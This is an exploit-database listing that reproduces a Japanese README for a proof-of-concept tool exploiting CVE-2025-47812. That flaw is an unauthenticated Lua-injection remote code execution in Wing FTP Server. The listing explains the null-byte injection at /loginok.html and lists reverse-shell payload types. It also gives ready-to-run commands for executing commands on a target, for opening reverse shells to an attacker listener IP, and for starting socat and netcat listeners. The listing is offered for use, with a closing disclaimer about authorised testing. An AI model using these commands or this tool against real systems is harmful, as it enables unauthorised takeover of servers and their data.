Sploitus

Exploit for CVE-2025-47812-PoC

kitploit · 2026-09-02

Exploit Code

MARKDOWN159 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-HAVBAY-CVE-2025-47812-POC
# CVE-2025-47812 — Wing FTP Server リモートコード実行 (RCE)

![Python](https://img.shields.io/badge/Python-3.7+-blue) ![CVSS](https://img.shields.io/badge/CVSS-10.0%20Critical-red) ![Type](https://img.shields.io/badge/Type-Unauthenticated%20RCE-orange)

## 概要

フィールド| 値  
---|---  
CVE| CVE-2025-47812  
影響を受けるバージョン| Wing FTP Server < 7.4.4  
タイプ| 認証不要のリモートコード実行  
CVSS スコア| 10.0 (緊急)  
修正バージョン| Wing FTP Server 7.4.4  
  
### 仕組み

脆弱性は `/loginok.html` ログインエンドポイントに存在します。サーバーは `username` フィールド内の null バイト (`%00`) を適切にサニタイズしません。これにより、攻撃者はセッションファイルに任意の **Lua コード** を注入でき、そのコードは後で `/dir.html` などのエンドポイントにアクセスした際にサーバーサイドで評価されます — 認証は一切不要です。

**参考:** https://nvd.nist.gov/vuln/detail/CVE-2025-47812

* * *

## 機能

  * 認証不要のコマンド実行
  * 複数のリバースシェルペイロード (socat, bash, python3, nc-e, nc-fifo, php)
  * 完全なインタラクティブ TTY のために Socat ペイロードを優先
  * 事前のターゲット到達可能性チェック
  * 試行ごとに新しいセッションを使用した自動セッション UID 抽出
  * `--payload` フラグで特定のペイロードを選択
  * `-o` でコマンド出力をファイルに保存
  * 設定可能な `--timeout` および `--delay`
  * `-v` で詳細/デバッグモード
  * `Ctrl+C` の適切なハンドリング
  * リバースシェル試行後のペイロードサマリー
  * CLI 引数モード + インタラクティブメニュー
  * 色分けされた出力



* * *

## 必要条件

root@kitploit:~
    
    
    pip install requests
    

* * *

## 使用方法

### インタラクティブモード

root@kitploit:~
    
    
    python3 wingftp_rce_exploit.py
    

### CLI モード

root@kitploit:~
    
    
    # Run a command
    python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id"
    
    # Save output to file
    python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id" -o results.txt
    
    # Reverse shell (try all payloads)
    python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444
    
    # Reverse shell (specific payload)
    python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444 --payload socat
    

### 全てのオプション

root@kitploit:~
    
    
    -u / --url        ターゲットのベース URL
    -U / --username   ログインユーザー名 (デフォルト: anonymous)
    -c / --command    実行するコマンド (コマンドモード)
    -r / --rhost      あなたのリスナー IP (リバースシェルモード)
    -p / --rport      あなたのリスナーポート (リバースシェルモード)
         --payload    使用する特定のペイロード (以下のリストを参照)
         --timeout    HTTP リクエストタイムアウト (秒) (デフォルト: 10)
         --delay      ペイロード試行間の遅延 (秒) (デフォルト: 4)
    -o / --output     コマンド出力をファイルに保存
    -v / --verbose    デバッグ出力を有効化
    

* * *

## リバースシェルペイロード

* * *

## 使用例

### コマンド実行

root@kitploit:~
    
    
    Target URL : http://192.168.1.10:5466
    Username   : anonymous
    選択     : 1
    Command    : whoami
    

### リバースシェル

**ステップ 1 — リスナーを起動 (完全な TTY には socat 推奨):**

root@kitploit:~
    
    
    socat file:`tty`,raw,echo=0 tcp-listen:4444,reuseaddr
    

または nc の場合:

root@kitploit:~
    
    
    nc -lvnp 4444
    

**ステップ 2 — エクスプロイトを実行:**

root@kitploit:~
    
    
    python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r YOUR_IP -p 4444
    

* * *

## クレジット

  * 元の PoC 作成者: blindma1den
  * 改良・拡張: Havbuy



* * *

## 免責事項

> このツールは**教育目的** および許可されたセキュリティテストのみを対象としています。  
>  自分が所有していない、または明示的な書面による許可を得ていないシステムに対しては**使用しないでください** 。  
>  不正使用は違法です。作者は誤用に対する一切の責任を負いません。